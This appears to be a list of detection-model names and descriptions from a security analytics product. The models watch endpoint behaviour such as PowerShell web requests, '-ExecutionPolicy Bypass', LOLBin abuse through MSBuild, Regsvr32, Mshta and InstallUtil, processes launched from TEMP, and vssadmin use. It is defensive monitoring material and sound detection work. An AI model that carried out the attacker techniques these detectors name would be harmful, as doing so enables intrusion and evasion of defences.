• A-EPA-Powershell-Invoke-WebRequest-Domain: Domains called with Powershell executions using invoke-webrequest for the asset in the organization. • A-PC-InstallUtil-exe: EXE file parameter passed to InstallUtil.exe on the asset. • A-PC-MSBuild-Csproj: CSPROJ file parameter passed to MSBuild.exe on the asset in the organization. • A-PC-MSBuild-xml: XML file parameter passed to MSBuild.exe on the asset in the organization. • A-PC-Regsvr32-sct: SCT file parameter passed to Regsvr32.exe on the asset in the organization. • A-PC-Mshta-Hta: HTA file parameter passed to Mshta.exe on the asset in the organization. • A-ServiceName-ServiceCmdline: Service Executable Files on the asset • A-PC-ParentName-ProcessName: Processes for parent parent processes. • A-EPA-USF: Processes per service name for asset • A-EPA-UP-TEMP: Processes executed from TEMP directories on this asset • A-EPA-OPP: Parent processes in the organization • A-EPA-HPP: Parent processes per host on this asset • A-EPA-ZP: Processes in the zone on asset • Powershell-ExecPolicy-Bypass: Suspicous powershell execution with '-ExecutionPolicy Bypass' for users in the organization. • PC-InstallUtil-dll: DLL file parameter passed to Installutil.exe • ParentProcess-P-New: Parent processes for peer group • Powershell-WMI-O: Users using Powershell WMI • Powershell-Commands: Powershell Commands per user • Powershell-Advanced: Users who use powershell capabilities • EPA-UH-Pen: Malicious tools used by user • EPA-PH: Hosts that executed 'vssadmin.exe' process • EPA-PDir: Process executable directories in the organization • EPA-PG-PS: Powershell executions for the peer group • EPA-PU-PS: Powershell executions for the user • EPA-GP: Processes for the peer group |